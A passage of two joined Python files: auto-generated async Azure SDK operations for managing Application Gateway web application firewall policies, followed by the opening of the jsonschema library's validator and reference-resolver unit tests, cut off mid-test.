:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
policy_name: str,
parameters: "_models.WebApplicationFirewallPolicy",
**kwargs: Any
) -> "_models.WebApplicationFirewallPolicy":
"""Creates or update policy with specified rule set name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:param parameters: Policy to be created.
:type parameters: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'WebApplicationFirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
policy_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
policy_name=policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
|
|
from collections import deque
from contextlib import contextmanager
import json
from jsonschema import FormatChecker, ValidationError
from jsonschema.tests.compat import mock, unittest
from jsonschema.validators import (
RefResolutionError, UnknownType, Draft3Validator,
Draft4Validator, RefResolver, create, extend, validator_for, validate,
)
class TestCreateAndExtend(unittest.TestCase):
def setUp(self):
self.meta_schema = {u"properties" : {u"smelly" : {}}}
self.smelly = mock.MagicMock()
self.validators = {u"smelly" : self.smelly}
self.types = {u"dict" : dict}
self.Validator = create(
meta_schema=self.meta_schema,
validators=self.validators,
default_types=self.types,
)
self.validator_value = 12
self.schema = {u"smelly" : self.validator_value}
self.validator = self.Validator(self.schema)
def test_attrs(self):
self.assertEqual(self.Validator.VALIDATORS, self.validators)
self.assertEqual(self.Validator.META_SCHEMA, self.meta_schema)
self.assertEqual(self.Validator.DEFAULT_TYPES, self.types)
def test_init(self):
self.assertEqual(self.validator.schema, self.schema)
def test_iter_errors(self):
instance = "hello"
self.smelly.return_value = []
self.assertEqual(list(self.validator.iter_errors(instance)), [])
error = mock.Mock()
self.smelly.return_value = [error]
self.assertEqual(list(self.validator.iter_errors(instance)), [error])
self.smelly.assert_called_with(
self.validator, self.validator_value, instance, self.schema,
)
def test_if_a_version_is_provided_it_is_registered(self):
with mock.patch("jsonschema.validators.validates") as validates:
validates.side_effect = lambda version : lambda cls : cls
Validator = create(meta_schema={u"id" : ""}, version="my version")
validates.assert_called_once_with("my version")
self.assertEqual(Validator.__name__, "MyVersionValidator")
def test_if_a_version_is_not_provided_it_is_not_registered(self):
with mock.patch("jsonschema.validators.validates") as validates:
create(meta_schema={u"id" : "id"})
self.assertFalse(validates.called)
def test_extend(self):
validators = dict(self.Validator.VALIDATORS)
new = mock.Mock()
Extended = extend(self.Validator, validators={u"a new one" : new})
validators.update([(u"a new one", new)])
self.assertEqual(Extended.VALIDATORS, validators)
self.assertNotIn(u"a new one", self.Validator.VALIDATORS)
self.assertEqual(Extended.META_SCHEMA, self.Validator.META_SCHEMA)
self.assertEqual(Extended.DEFAULT_TYPES, self.Validator.DEFAULT_TYPES)
class TestIterErrors(unittest.TestCase):
def setUp(self):
self.validator = Draft3Validator({})
def test_iter_errors(self):
instance = [1, 2]
schema = {
u"disallow" : u"array",
u"enum" : [["a", "b", "c"], ["d", "e", "f"]],
u"minItems" : 3
}
got = (e.message for e in self.validator.iter_errors(instance, schema))
expected = [
"%r is disallowed for [1, 2]" % (schema["disallow"],),
"[1, 2] is too short",
"[1, 2] is not one of %r" % (schema["enum"],),
]
self.assertEqual(sorted(got), sorted(expected))
def test_iter_errors_multiple_failures_one_validator(self):
instance = {"foo" : 2, "bar" : [1], "baz" : 15, "quux" : "spam"}
schema = {
u"properties" : {
"foo" : {u"type" : "string"},
"bar" : {u"minItems" : 2},
"baz" : {u"maximum" : 10, u"enum" : [2, 4, 6, 8]},
}
}
errors = list(self.validator.iter_errors(instance, schema))
self.assertEqual(len(errors), 4)
class TestValidationErrorMessages(unittest.TestCase):
def message_for(self, instance, schema, *args, **kwargs):
kwargs.setdefault("cls", Draft3Validator)
with self.assertRaises(ValidationError) as e:
validate(instance, schema, *args, **kwargs)
return e.exception.message
def test_single_type_failure(self):
message = self.message_for(instance=1, schema={u"type" : u"string"})
self.assertEqual(message, "1 is not of type %r" % u"string")
def test_single_type_list_failure(self):
message = self.message_for(instance=1, schema={u"type" : [u"string"]})
self.assertEqual(message, "1 is not of type %r" % u"string")
def test_multiple_type_failure(self):
types = u"string", u"object"
message = self.message_for(instance=1, schema={u"type" : list(types)})
self.assertEqual(message, "1 is not of type %r, %r" % types)
def test_object_without_title_type_failure(self):
type = {u"type" : [{u"minimum" : 3}]}
message = self.message_for(instance=1, schema={u"type" : [type]})
self.assertEqual(message, "1 is not of type %r" % (type,))
def test_object_with_name_type_failure(self):
name = "Foo"
schema = {u"type" : [{u"name" : name, u"minimum" : 3}]}
message = self.message_for(instance=1, schema=schema)
self.assertEqual(message, "1 is not of type %r" % (name,))
def test_minimum(self):
message = self.message_for(instance=1, schema={"minimum" : 2})
self.assertEqual(message, "1 is less than the minimum of 2")
def test_maximum(self):
message = self.message_for(instance=1, schema={"maximum" : 0})
self.assertEqual(message, "1 is greater than the maximum of 0")
def test_dependencies_failure_has_single_element_not_list(self):
depend, on = "bar", "foo"
schema = {u"dependencies" : {depend : on}}
message = self.message_for({"bar" : 2}, schema)
self.assertEqual(message, "%r is a dependency of %r" % (on, depend))
def test_additionalItems_single_failure(self):
message = self.message_for(
[2], {u"items" : [], u"additionalItems" : False},
)
self.assertIn("(2 was unexpected)", message)
def test_additionalItems_multiple_failures(self):
message = self.message_for(
[1, 2, 3], {u"items" : [], u"additionalItems" : False}
)
self.assertIn("(1, 2, 3 were unexpected)", message)
def test_additionalProperties_single_failure(self):
additional = "foo"
schema = {u"additionalProperties" : False}
message = self.message_for({additional : 2}, schema)
self.assertIn("(%r was unexpected)" % (additional,), message)
def test_additionalProperties_multiple_failures(self):
schema = {u"additionalProperties" : False}
message = self.message_for(dict.fromkeys(["foo", "bar"]), schema)
self.assertIn(repr("foo"), message)
self.assertIn(repr("bar"), message)
self.assertIn("were unexpected)", message)
def test_invalid_format_default_message(self):
checker = FormatChecker(formats=())
check_fn = mock.Mock(return_value=False)
checker.checks(u"thing")(check_fn)
schema = {u"format" : u"thing"}
message = self.message_for("bla", schema, format_checker=checker)
self.assertIn(repr("bla"), message)
self.assertIn(repr("thing"), message)
self.assertIn("is not a", message)
class TestValidationErrorDetails(unittest.TestCase):
# TODO: These really need unit tests for each individual validator, rather
# than just these higher level tests.
def test_anyOf(self):
instance = 5
schema = {
"anyOf": [
{"minimum": 20},
{"type": "string"}
]
}
validator = Draft4Validator(schema)
errors = list(validator.iter_errors(instance))
self.assertEqual(len(errors), 1)
e = errors[0]
self.assertEqual(e.validator, "anyOf")
self.assertEqual(e.validator_value, schema["anyOf"])
self.assertEqual(e.instance, instance)
self.assertEqual(e.schema, schema)
self.assertIsNone(e.parent)
self.assertEqual(e.path, deque([]))
self.assertEqual(e.relative_path, deque([]))
self.assertEqual(e.absolute_path, deque([]))
self.assertEqual(e.schema_path, deque(["anyOf"]))
self.assertEqual(e.relative_schema_path, deque(["anyOf"]))
self.assertEqual(e.absolute_schema_path, deque(["anyOf"]))
self.assertEqual(len(e.context), 2)
e1, e2 = sorted_errors(e.context)
self.assertEqual(e1.validator, "minimum")
self.assertEqual(e1.validator_value, schema["anyOf"][0]["minimum"])
self.assertEqual(e1.instance, instance)
self.assertEqual(e1.schema, schema["anyOf"][0])
self.assertIs(e1.parent, e)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e1.absolute_path, deque([]))
self.assertEqual(e1.relative_path, deque([]))
self.assertEqual(e1.schema_path, deque([0, "minimum"]))
self.assertEqual(e1.relative_schema_path, deque([0, "minimum"]))
self.assertEqual(
e1.absolute_schema_path, deque(["anyOf", 0, "minimum"]),
)
self.assertFalse(e1.context)
self.assertEqual(e2.validator, "type")
self.assertEqual(e2.validator_value, schema["anyOf"][1]["type"])
self.assertEqual(e2.instance, instance)
self.assertEqual(e2.schema, schema["anyOf"][1])
self.assertIs(e2.parent, e)
self.assertEqual(e2.path, deque([]))
self.assertEqual(e2.relative_path, deque([]))
self.assertEqual(e2.absolute_path, deque([]))
self.assertEqual(e2.schema_path, deque([1, "type"]))
self.assertEqual(e2.relative_schema_path, deque([1, "type"]))
self.assertEqual(e2.absolute_schema_path, deque(["anyOf", 1, "type"]))
self.assertEqual(len(e2.context), 0)
def test_type(self):
instance = {"foo": 1}
schema = {
"type": [
{"type": "integer"},
{
"type": "object",
"properties": {
"foo": {"enum": [2]}
}
}
]
}
validator = Draft3Validator(schema)
errors = list(validator.iter_errors(instance))
self.assertEqual(len(errors), 1)
e = errors[0]
self.assertEqual(e.validator, "type")
self.assertEqual(e.validator_value, schema["type"])
self.assertEqual(e.instance, instance)
self.assertEqual(e.schema, schema)
self.assertIsNone(e.parent)
self.assertEqual(e.path, deque([]))
self.assertEqual(e.relative_path, deque([]))
self.assertEqual(e.absolute_path, deque([]))
self.assertEqual(e.schema_path, deque(["type"]))
self.assertEqual(e.relative_schema_path, deque(["type"]))
self.assertEqual(e.absolute_schema_path, deque(["type"]))
self.assertEqual(len(e.context), 2)
e1, e2 = sorted_errors(e.context)
self.assertEqual(e1.validator, "type")
self.assertEqual(e1.validator_value, schema["type"][0]["type"])
self.assertEqual(e1.instance, instance)
self.assertEqual(e1.schema, schema["type"][0])
self.assertIs(e1.parent, e)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e1.relative_path, deque([]))
self.assertEqual(e1.absolute_path, deque([]))
self.assertEqual(e1.schema_path, deque([0, "type"]))
self.assertEqual(e1.relative_schema_path, deque([0, "type"]))
self.assertEqual(e1.absolute_schema_path, deque(["type", 0, "type"]))
self.assertFalse(e1.context)
self.assertEqual(e2.validator, "enum")
self.assertEqual(e2.validator_value, [2])
self.assertEqual(e2.instance, 1)
self.assertEqual(e2.schema, {u"enum" : [2]})
self.assertIs(e2.parent, e)
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e2.relative_path, deque(["foo"]))
self.assertEqual(e2.absolute_path, deque(["foo"]))
self.assertEqual(
e2.schema_path, deque([1, "properties", "foo", "enum"]),
)
self.assertEqual(
e2.relative_schema_path, deque([1, "properties", "foo", "enum"]),
)
self.assertEqual(
e2.absolute_schema_path,
deque(["type", 1, "properties", "foo", "enum"]),
)
self.assertFalse(e2.context)
def test_single_nesting(self):
instance = {"foo" : 2, "bar" : [1], "baz" : 15, "quux" : "spam"}
schema = {
"properties" : {
"foo" : {"type" : "string"},
"bar" : {"minItems" : 2},
"baz" : {"maximum" : 10, "enum" : [2, 4, 6, 8]},
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2, e3, e4 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["baz"]))
self.assertEqual(e3.path, deque(["baz"]))
self.assertEqual(e4.path, deque(["foo"]))
self.assertEqual(e1.relative_path, deque(["bar"]))
self.assertEqual(e2.relative_path, deque(["baz"]))
self.assertEqual(e3.relative_path, deque(["baz"]))
self.assertEqual(e4.relative_path, deque(["foo"]))
self.assertEqual(e1.absolute_path, deque(["bar"]))
self.assertEqual(e2.absolute_path, deque(["baz"]))
self.assertEqual(e3.absolute_path, deque(["baz"]))
self.assertEqual(e4.absolute_path, deque(["foo"]))
self.assertEqual(e1.validator, "minItems")
self.assertEqual(e2.validator, "enum")
self.assertEqual(e3.validator, "maximum")
self.assertEqual(e4.validator, "type")
def test_multiple_nesting(self):
instance = [1, {"foo" : 2, "bar" : {"baz" : [1]}}, "quux"]
schema = {
"type" : "string",
"items" : {
"type" : ["string", "object"],
"properties" : {
"foo" : {"enum" : [1, 3]},
"bar" : {
"type" : "array",
"properties" : {
"bar" : {"required" : True},
"baz" : {"minItems" : 2},
}
}
}
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2, e3, e4, e5, e6 = sorted_errors(errors)
self.assertEqual(e1.path, deque([]))
self.assertEqual(e2.path, deque([0]))
self.assertEqual(e3.path, deque([1, "bar"]))
self.assertEqual(e4.path, deque([1, "bar", "bar"]))
self.assertEqual(e5.path, deque([1, "bar", "baz"]))
self.assertEqual(e6.path, deque([1, "foo"]))
self.assertEqual(e1.schema_path, deque(["type"]))
self.assertEqual(e2.schema_path, deque(["items", "type"]))
self.assertEqual(
list(e3.schema_path), ["items", "properties", "bar", "type"],
)
self.assertEqual(
list(e4.schema_path),
["items", "properties", "bar", "properties", "bar", "required"],
)
self.assertEqual(
list(e5.schema_path),
["items", "properties", "bar", "properties", "baz", "minItems"]
)
self.assertEqual(
list(e6.schema_path), ["items", "properties", "foo", "enum"],
)
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "type")
self.assertEqual(e3.validator, "type")
self.assertEqual(e4.validator, "required")
self.assertEqual(e5.validator, "minItems")
self.assertEqual(e6.validator, "enum")
def test_recursive(self):
schema = {
"definitions": {
"node": {
"anyOf": [{
"type": "object",
"required": ["name", "children"],
"properties": {
"name": {
"type": "string",
},
"children": {
"type": "object",
"patternProperties": {
"^.*$": {
"$ref": "#/definitions/node",
},
},
},
},
}],
},
},
"type": "object",
"required": ["root"],
"properties": {
"root": {"$ref": "#/definitions/node"},
}
}
instance = {
"root": {
"name": "root",
"children": {
"a": {
"name": "a",
"children": {
"ab": {
"name": "ab",
# missing "children"
}
}
},
},
},
}
validator = Draft4Validator(schema)
e, = validator.iter_errors(instance)
self.assertEqual(e.absolute_path, deque(["root"]))
self.assertEqual(
e.absolute_schema_path, deque(["properties", "root", "anyOf"]),
)
e1, = e.context
self.assertEqual(e1.absolute_path, deque(["root", "children", "a"]))
self.assertEqual(
e1.absolute_schema_path, deque(
[
"properties",
"root",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf",
],
),
)
e2, = e1.context
self.assertEqual(
e2.absolute_path, deque(
["root", "children", "a", "children", "ab"],
),
)
self.assertEqual(
e2.absolute_schema_path, deque(
[
"properties",
"root",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf",
0,
"properties",
"children",
"patternProperties",
"^.*$",
"anyOf"
],
),
)
def test_additionalProperties(self):
instance = {"bar": "bar", "foo": 2}
schema = {
"additionalProperties" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_patternProperties(self):
instance = {"bar": 1, "foo": 2}
schema = {
"patternProperties" : {
"bar": {"type": "string"},
"foo": {"minimum": 5}
}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque(["bar"]))
self.assertEqual(e2.path, deque(["foo"]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_additionalItems(self):
instance = ["foo", 1]
schema = {
"items": [],
"additionalItems" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque([0]))
self.assertEqual(e2.path, deque([1]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
def test_additionalItems_with_items(self):
instance = ["foo", "bar", 1]
schema = {
"items": [{}],
"additionalItems" : {"type": "integer", "minimum": 5}
}
validator = Draft3Validator(schema)
errors = validator.iter_errors(instance)
e1, e2 = sorted_errors(errors)
self.assertEqual(e1.path, deque([1]))
self.assertEqual(e2.path, deque([2]))
self.assertEqual(e1.validator, "type")
self.assertEqual(e2.validator, "minimum")
class ValidatorTestMixin(object):
def setUp(self):
self.instance = mock.Mock()
self.schema = {}
self.resolver = mock.Mock()
self.validator = self.validator_class(self.schema)
def test_valid_instances_are_valid(self):
errors = iter([])
with mock.patch.object(
self.validator, "iter_errors", return_value=errors,
):
self.assertTrue(
self.validator.is_valid(self.instance, self.schema)
)
def test_invalid_instances_are_not_valid(self):
errors = iter([mock.Mock()])
with mock.patch.object(
self.validator, "iter_errors", return_value=errors,
):
self.assertFalse(
self.validator.is_valid(self.instance, self.schema)
)
def test_non_existent_properties_are_ignored(self):
instance, my_property, my_value = mock.Mock(), mock.Mock(), mock.Mock()
validate(instance=instance, schema={my_property : my_value})
def test_it_creates_a_ref_resolver_if_not_provided(self):
self.assertIsInstance(self.validator.resolver, RefResolver)
def test_it_delegates_to_a_ref_resolver(self):
resolver = RefResolver("", {})
schema = {"$ref" : mock.Mock()}
@contextmanager
def resolving():
yield {"type": "integer"}
with mock.patch.object(resolver, "resolving") as resolve:
resolve.return_value = resolving()
with self.assertRaises(ValidationError):
self.validator_class(schema, resolver=resolver).validate(None)
resolve.assert_called_once_with(schema["$ref"])
def test_is_type_is_true_for_valid_type(self):
self.assertTrue(self.validator.is_type("foo", "string"))
def test_is_type_is_false_for_invalid_type(self):
self.assertFalse(self.validator.is_type("foo", "array"))
def test_is_type_evades_bool_inheriting_from_int(self):
self.assertFalse(self.validator.is_type(True, "integer"))
self.assertFalse(self.validator.is_type(True, "number"))
def test_is_type_raises_exception_for_unknown_type(self):
with self.assertRaises(UnknownType):
self.validator.is_type("foo", object())
class TestDraft3Validator(ValidatorTestMixin, unittest.TestCase):
validator_class = Draft3Validator
def test_is_type_is_true_for_any_type(self):
self.assertTrue(self.validator.is_valid(mock.Mock(), {"type": "any"}))
def test_is_type_does_not_evade_bool_if_it_is_being_tested(self):
self.assertTrue(self.validator.is_type(True, "boolean"))
self.assertTrue(self.validator.is_valid(True, {"type": "any"}))
def test_non_string_custom_types(self):
schema = {'type': [None]}
cls = self.validator_class(schema, types={None: type(None)})
cls.validate(None, schema)
class TestDraft4Validator(ValidatorTestMixin, unittest.TestCase):
validator_class = Draft4Validator
class TestBuiltinFormats(unittest.TestCase):
"""
The built-in (specification-defined) formats do not raise type errors.
If an instance or value is not a string, it should be ignored.
"""
for format in FormatChecker.checkers:
def test(self, format=format):
v = Draft4Validator({"format": format}, format_checker=FormatChecker())
v.validate(123)
name = "test_{0}_ignores_non_strings".format(format)
test.__name__ = name
setattr(TestBuiltinFormats, name, test)
del test # Ugh py.test. Stop discovering top level tests.
class TestValidatorFor(unittest.TestCase):
def test_draft_3(self):
schema = {"$schema" : "http://json-schema.org/draft-03/schema"}
self.assertIs(validator_for(schema), Draft3Validator)
schema = {"$schema" : "http://json-schema.org/draft-03/schema#"}
self.assertIs(validator_for(schema), Draft3Validator)
def test_draft_4(self):
schema = {"$schema" : "http://json-schema.org/draft-04/schema"}
self.assertIs(validator_for(schema), Draft4Validator)
schema = {"$schema" : "http://json-schema.org/draft-04/schema#"}
self.assertIs(validator_for(schema), Draft4Validator)
def test_custom_validator(self):
Validator = create(meta_schema={"id" : "meta schema id"}, version="12")
schema = {"$schema" : "meta schema id"}
self.assertIs(validator_for(schema), Validator)
def test_validator_for_jsonschema_default(self):
self.assertIs(validator_for({}), Draft4Validator)
def test_validator_for_custom_default(self):
self.assertIs(validator_for({}, default=None), None)
class TestValidate(unittest.TestCase):
def test_draft3_validator_is_chosen(self):
schema = {"$schema" : "http://json-schema.org/draft-03/schema#"}
with mock.patch.object(Draft3Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
# Make sure it works without the empty fragment
schema = {"$schema" : "http://json-schema.org/draft-03/schema"}
with mock.patch.object(Draft3Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
def test_draft4_validator_is_chosen(self):
schema = {"$schema" : "http://json-schema.org/draft-04/schema#"}
with mock.patch.object(Draft4Validator, "check_schema") as chk_schema:
validate({}, schema)
chk_schema.assert_called_once_with(schema)
def test_draft4_validator_is_the_default(self):
with mock.patch.object(Draft4Validator, "check_schema") as chk_schema:
validate({}, {})
chk_schema.assert_called_once_with({})
class TestRefResolver(unittest.TestCase):
base_uri = ""
stored_uri = "foo://stored"
stored_schema = {"stored" : "schema"}
def setUp(self):
self.referrer = {}
self.store = {self.stored_uri : self.stored_schema}
self.resolver = RefResolver(self.base_uri, self.referrer, self.store)
def test_it_does_not_retrieve_schema_urls_from_the_network(self):
ref = Draft3Validator.META_SCHEMA["id"]
with mock.patch.object(self.resolver, "resolve_remote") as remote:
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, Draft3Validator.META_SCHEMA)
self.assertFalse(remote.called)
def test_it_resolves_local_refs(self):
ref = "#/properties/foo"
self.referrer["properties"] = {"foo" : object()}
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, self.referrer["properties"]["foo"])
def test_it_resolves_local_refs_with_id(self):
schema = {"id": "foo://bar/schema#", "a": {"foo": "bar"}}
resolver = RefResolver.from_schema(schema)
with resolver.resolving("#/a") as resolved:
self.assertEqual(resolved, schema["a"])
with resolver.resolving("foo://bar/schema#/a") as resolved:
self.assertEqual(resolved, schema["a"])
def test_it_retrieves_stored_refs(self):
with self.resolver.resolving(self.stored_uri) as resolved:
self.assertIs(resolved, self.stored_schema)
self.resolver.store["cached_ref"] = {"foo" : 12}
with self.resolver.resolving("cached_ref#/foo") as resolved:
self.assertEqual(resolved, 12)
def test_it_retrieves_unstored_refs_via_requests(self):
ref = "http://bar#baz"
schema = {"baz" : 12}
with mock.patch("jsonschema.validators.requests") as requests:
requests.get.return_value.json.return_value = schema
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, 12)
requests.get.assert_called_once_with("http://bar")
def test_it_retrieves_unstored_refs_via_urlopen(self):
ref = "http://bar#baz"
schema = {"baz" : 12}
with mock.patch("jsonschema.validators.requests", None):
with mock.patch("jsonschema.validators.urlopen") as urlopen:
urlopen.return_value.read.return_value = (
json.dumps(schema).encode("utf8"))
with self.resolver.resolving(ref) as resolved:
self.assertEqual(resolved, 12)
urlopen.assert_called_once_with("http://bar")
def test_it_can_construct_a_base_uri_from_a_schema(self):
schema = {"id" : "foo"}
resolver = RefResolver.from_schema(schema)
self.assertEqual(resolver.base_uri, "foo")
with resolver.resolving("") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("#") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("foo") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("foo#") as resolved:
self.assertEqual(resolved, schema)
def test_it_can_construct_a_base_uri_from_a_schema_without_id(self):
schema = {}
resolver = RefResolver.from_schema(schema)
self.assertEqual(resolver.base_uri, "")
with resolver.resolving("") as resolved:
self.assertEqual(resolved, schema)
with resolver.resolving("#") as resolved:
